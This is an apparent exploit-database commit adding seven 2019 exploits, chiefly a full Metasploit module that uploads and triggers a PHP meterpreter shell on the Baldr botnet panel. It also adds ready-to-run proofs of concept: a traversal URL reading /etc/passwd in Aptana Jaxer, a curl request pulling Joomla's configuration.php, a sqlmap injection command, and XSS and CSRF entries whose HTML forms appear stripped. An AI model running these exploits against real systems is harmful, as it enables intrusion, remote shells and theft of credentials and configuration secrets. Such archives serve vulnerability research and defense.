From d82ffc9cd0e25938ab9a16c806fb574bcd631a45 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 9 Aug 2019 05:02:23 +0000 Subject: [PATCH] DB: 2019-08-09 7 changes to exploits/shellcodes Baldr Botnet Panel - Arbitrary Code Execution (Metasploit) Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income) Aptana Jaxer 1.0.3.4547 - Local File inclusion Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download Adive Framework 2.0.7 - Cross-Site Request Forgery Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection --- exploits/multiple/webapps/47214.txt | 14 ++ exploits/php/remote/47215.rb | 242 ++++++++++++++++++++++++++++ exploits/php/webapps/47212.txt | 16 ++ exploits/php/webapps/47213.txt | 18 +++ exploits/php/webapps/47216.txt | 51 ++++++ exploits/php/webapps/47217.txt | 33 ++++ exploits/php/webapps/47218.txt | 44 +++++ files_exploits.csv | 7 + 8 files changed, 425 insertions(+) create mode 100644 exploits/multiple/webapps/47214.txt create mode 100755 exploits/php/remote/47215.rb create mode 100644 exploits/php/webapps/47212.txt create mode 100644 exploits/php/webapps/47213.txt create mode 100644 exploits/php/webapps/47216.txt create mode 100644 exploits/php/webapps/47217.txt create mode 100644 exploits/php/webapps/47218.txt diff --git a/exploits/multiple/webapps/47214.txt b/exploits/multiple/webapps/47214.txt new file mode 100644 index 000000000..0e72ba7fe --- /dev/null +++ b/exploits/multiple/webapps/47214.txt @@ -0,0 +1,14 @@ +# Exploit Title: Aptana Jaxer Remote Local File inclusion +# Date: 8/8/2019 +# Exploit Author: Steph Jensen +# Vendor Homepage: +[http://www.jaxer.org](http://www.jaxer.org/category/uncategorized/) +# Version: 1.0.3.4547 +# Tested on: Linux +# CVE : CVE-2019-14312 + +Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via tools/sourceViewer/index.html?filename=../ URI. + +To exploit this vulnerability an attacker must have access to the Aptana Jaxer web application. The Samples and Tools page will have the wikilite demo. After opening the wikilite demo the source code can be viewed by clicking the html button and selecting "Wikilite source code". This leads to http://server:8081/aptana/tools/sourceViewer/index.html?filename=../../samples/wikilite/index.html. by using directory traversal in the filename parameter a remote attacker can access internal files on the server. + +PoC: http://server:8081/aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd \ No newline at end of file diff --git a/exploits/php/remote/47215.rb b/exploits/php/remote/47215.rb new file mode 100755 index 000000000..993fc83d3 --- /dev/null +++ b/exploits/php/remote/47215.rb @@ -0,0 +1,242 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'net/http' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Baldr Botnet Panel Shell Upload Exploit", + 'Description' => %q{ + This module exploits the file upload vulnerability of baldr malware panel. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ege Balcı ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://prodaft.com'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'WfsDelay' => 5, + }, + 'Platform' => ['php'], + 'Arch' => [ ARCH_PHP], + 'Targets' => + [ + ['Auto', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ], + ['Baldr <= v2.0', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ], + ['Baldr v2.2', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ], + ['Baldr v3.0 & v3.1', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 19 2018", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the baldr gate', '/']), + ] + ) + end + + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/gate.php") + ) + + ver = '' + + if res.code == 200 + if res.body.include?('~;~') + targets[3] = targets[0] + #target = targets[3] + ver = '>= v3.0' + elsif res.body.include?(';') + #target = targets[2] + targets[2] = targets[0] + ver = 'v2.2' + elsif res.body.size < 4 + targets[1] = targets[0] + #target = targets[1] + ver = '<= v2.0' + else + Exploit::CheckCode::Safe + end + print_status("Baldr verison: #{ver}") + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + + name = '.'+Rex::Text.rand_text_alpha(4) + files = + [ + {data: payload.encoded, fname: "#{name}.php"} + ] + zip = Msf::Util::EXE.to_zip(files) + hwid = Rex::Text.rand_text_alpha(8).upcase + + if targets[0] + check + end + + + case target + when targets[3] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/gate.php")} + ) + key = res.body.to_s.split('~;~')[0] + print_good("Key: #{key}") + + data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0" + data = xor(data,key) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/gate.php"), + 'data' => data.to_s + } + ) + + if res.code == 200 + print_good("Bot successfully registered.") + else + print_error("New bot register failed !") + return false + end + + data = xor(zip.to_s,key) + form = Rex::MIME::Message.new + form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"file.zip\"") + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,"/gate.php"), + 'ctype' => "multipart/form-data; boundary=#{form.bound}", + 'data' => form.to_s + ) + if res && (res.code == 200 ||res.code == 100) + print_good("Payload uploaded to /logs/#{hwid}/#{name}.php") + else + print_error("Server responded with code #{res.code}") if res + print_error("Failed to upload payload.") + return false + end + + when targets[2] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/gate.php")} + ) + key = res.body.to_s.split(';')[0] + print_good("Key: #{key}") + data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***" + data << zip.to_s + + result = "" + codepoints = data.each_codepoint.to_a + codepoints.each_index do |i| + result += (codepoints[i] ^ key[i % key.size].ord).chr + end + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,"/gate.php"), + 'data' => result.to_s + ) + if res && (res.code == 200 ||res.code == 100) + print_good("Payload uploaded to /logs/#{hwid}/#{name}.php") + else + print_error("Server responded with code #{res.code}") if res + print_error("Failed to upload payload.") + return false + end + else + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,"/gate.php"), + 'data' => zip.to_s, + 'encode_params' => true, + 'vars_get' => { + 'hwid' => hwid, + 'os' => 'Windows 7 x64', + 'cookie' => '0', + 'pswd' => '0', + 'credit' => '0', + 'wallet' => '0', + 'file' => '1', + 'autofill' => '0', + 'version' => 'v2.0' + } + ) + + if res && (res.code == 200 ||res.code == 100) + print_good("Payload uploaded to /logs/#{hwid}/#{name}.php") + else + print_error("Server responded with code #{res.code}") if res + print_error("Failed to upload payload.") + return false + end + end + + + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/logs/#{hwid}/#{name}.php")}, 3 + ) + + print_good("Payload successfully triggered !") + end + + def xor(data, key) + result = "" + codepoints = data.each_codepoint.to_a + codepoints.each_index do |i| + result += (codepoints[i] ^ key[i % key.size].ord).chr + end + return result + end + + +end \ No newline at end of file diff --git a/exploits/php/webapps/47212.txt b/exploits/php/webapps/47212.txt new file mode 100644 index 000000000..361afcae2 --- /dev/null +++ b/exploits/php/webapps/47212.txt @@ -0,0 +1,16 @@ +# Exploit Title: [title] +# Date: [2019 08 06] +# Exploit Author: [Greg.Priest] +# Vendor Homepage: [https://open-school.org/] +# Software Link: [] +# Version: [Open-School 3.0/Community Edition 2.3] +# Tested on: [Windows/Linux ] +# CVE : [CVE-2019-14696] + + +Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter. + +/index.php?r=students/guardians/create&id=1[inject JavaScript Code] + +Example: +/index.php?r=students/guardians/create&id=1 \ No newline at end of file diff --git a/exploits/php/webapps/47213.txt b/exploits/php/webapps/47213.txt new file mode 100644 index 000000000..9af44893f --- /dev/null +++ b/exploits/php/webapps/47213.txt @@ -0,0 +1,18 @@ +# Exploit Title: Daily Expense Manager - CSRF (Delete Income) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan@gmail.com +# Discovery Date: August 8, 2019 +# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/ +# Tested Version: 1.0 +# Tested on: Parrot OS + + +# PoC: + + + +
+ +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/47216.txt b/exploits/php/webapps/47216.txt new file mode 100644 index 000000000..837bd897d --- /dev/null +++ b/exploits/php/webapps/47216.txt @@ -0,0 +1,51 @@ +#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download +#Dork: inurl:"index.php?option=com_jssupportticket" +#Date: 08.08.19 +#Exploit Author: qw3rTyTy +#Vendor Homepage: http://joomsky.com/ +#Software Link: https://www.joomsky.com/46/download/1.html +#Version: 1.1.5 +#Tested on: Debian/nginx/joomla 3.9.0 +##################################### +#Vulnerability details: +##################################### +Vulnerable code is in line 1411 in file admin/models/ticket.php + + 1382 function getDownloadAttachmentByName($file_name,$id){ + 1383 if(empty($file_name)) return false; + 1384 if(!is_numeric($id)) return false; + 1385 $db = JFactory::getDbo(); + 1386 $filename = str_replace(' ', '_',$file_name); + 1387 $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id; + 1388 $db->setQuery($query); + 1389 $foldername = $db->loadResult(); + 1390 + 1391 $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory'); + 1392 $base = JPATH_BASE; + 1393 if(JFactory::getApplication()->isAdmin()){ + 1394 $base = substr($base, 0, strlen($base) - 14); //remove administrator + 1395 } + 1396 $path = $base.'/'.$datadirectory; + 1397 $path = $path . '/attachmentdata'; + 1398 $path = $path . '/ticket/' . $foldername; + 1399 $file = $path . '/' . $filename; + 1400 + 1401 header('Content-Description: File Transfer'); + 1402 header('Content-Type: application/octet-stream'); + 1403 header('Content-Disposition: attachment; filename=' . basename($file)); + 1404 header('Content-Transfer-Encoding: binary'); + 1405 header('Expires: 0'); + 1406 header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); + 1407 header('Pragma: public'); + 1408 header('Content-Length: ' . filesize($file)); + 1409 //ob_clean(); + 1410 flush(); + 1411 readfile($file); //!!! + 1412 exit(); + 1413 exit; + 1414 } + +##################################### +#PoC: +##################################### +$> curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php" \ No newline at end of file diff --git a/exploits/php/webapps/47217.txt b/exploits/php/webapps/47217.txt new file mode 100644 index 000000000..fea2705a9 --- /dev/null +++ b/exploits/php/webapps/47217.txt @@ -0,0 +1,33 @@ +# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF) +# Date:02/08/2019. +# Exploit Author: Pablo Santiago +# Vendor Homepage: https://adive.es +# Software Link: https://github.com/ferdinandmartin/adive-php7 +# Version: 2.0.7 +# Tested on: Windows and Kali linux +# CVE :2019-14346 + +# 1. Technical Description: +# Adive Framework 2.0.7 and possibly before are affected by Cross-Site +#Request Forgery vulnerability, an attacker could change any user +password. + +# 2. Proof Of Concept (CODE): + + + + +
+ + + + + + +
+ + + +# 3. References: +# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/ +# https://imgur.com/apuZa9q \ No newline at end of file diff --git a/exploits/php/webapps/47218.txt b/exploits/php/webapps/47218.txt new file mode 100644 index 000000000..a2d498e5f --- /dev/null +++ b/exploits/php/webapps/47218.txt @@ -0,0 +1,44 @@ +#Exploit Title: Joomla! component com_jssupportticket - SQL Injection +#Dork: inurl:"index.php?option=com_jssupportticket" +#Date: 08.08.19 +#Exploit Author: qw3rTyTy +#Vendor Homepage: https://www.joomsky.com/ +#Software Link: https://www.joomsky.com/46/download/1.html +#Version: 1.1.5 +#Tested on: Debian/nginx/joomla 3.9.0 +##################################### +#Vulnerability details: +##################################### +Vulnerable code is in line 441 in file admin/models/userfields.php + + 439 function dataForDepandantField( $val , $childfield){ + 440 $db = $this->getDBO(); + 441 $query = "SELECT userfieldparams,fieldtitle,field,depandant_field FROM `#__js_ticket_fieldsordering` WHERE field = '".$childfield."'"; //!!! + 442 $db->setQuery($query); + 443 $data = $db->loadObject(); + 444 $decoded_data = json_decode($data->userfieldparams); + 445 $comboOptions = array(); + 446 $flag = 0; + 447 foreach ($decoded_data as $key => $value) { + 448 if($key == $val){ + 449 for ($i=0; $i < count($value) ; $i++) { + 450 if($flag == 0){ + 451 $comboOptions[] = array('value' => '', 'text' => JText::_('Select').' '.$data->fieldtitle); + 452 } + 453 $comboOptions[] = array('value' => $value[$i], 'text' => $value[$i]); + 454 $flag = 1; + 455 } + 456 } + 457 } + 458 $jsFunction = ''; + 459 if ($data->depandant_field != null) { + 460 $jsFunction = "onchange=getDataForDepandantField('" . $data->field . "','" . $data->depandant_field . "',1);"; + 461 } + 462 $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class="inputbox one"'.$jsFunction, 'value' , 'text' ,''); + 463 return $html; + 464 } + +##################################### +#PoC: +##################################### +$> sqlmap.py -u "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0" --random-agent -p child --dbms=mysql \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2b1833f18..7dd85753f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17594,6 +17594,7 @@ id,file,description,date,author,type,platform,port 47195,exploits/linux/remote/47195.rb,"Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",2019-07-30,Metasploit,remote,linux,6379 47208,exploits/windows/remote/47208.rb,"Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)",2019-08-05,Metasploit,remote,windows, 47209,exploits/multiple/remote/47209.py,"ARMBot Botnet - Arbitrary Code Execution",2019-08-05,prsecurity,remote,multiple, +47215,exploits/php/remote/47215.rb,"Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)",2019-08-08,"Ege Balci",remote,php,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41579,3 +41580,9 @@ id,file,description,date,author,type,platform,port 47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80 47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80 47210,exploits/php/webapps/47210.txt,"WordPress Plugin JoomSport 3.3 - SQL Injection",2019-08-07,"Pablo Santiago",webapps,php,80 +47212,exploits/php/webapps/47212.txt,"Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting",2019-08-08,Greg.Priest,webapps,php,80 +47213,exploits/php/webapps/47213.txt,"Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)",2019-08-08,"Mr Winst0n",webapps,php,80 +47214,exploits/multiple/webapps/47214.txt,"Aptana Jaxer 1.0.3.4547 - Local File inclusion",2019-08-08,"Steph Jensen",webapps,multiple, +47216,exploits/php/webapps/47216.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download",2019-08-08,qw3rTyTy,webapps,php,80 +47217,exploits/php/webapps/47217.txt,"Adive Framework 2.0.7 - Cross-Site Request Forgery",2019-08-08,"Pablo Santiago",webapps,php,80 +47218,exploits/php/webapps/47218.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection",2019-08-08,qw3rTyTy,webapps,php,80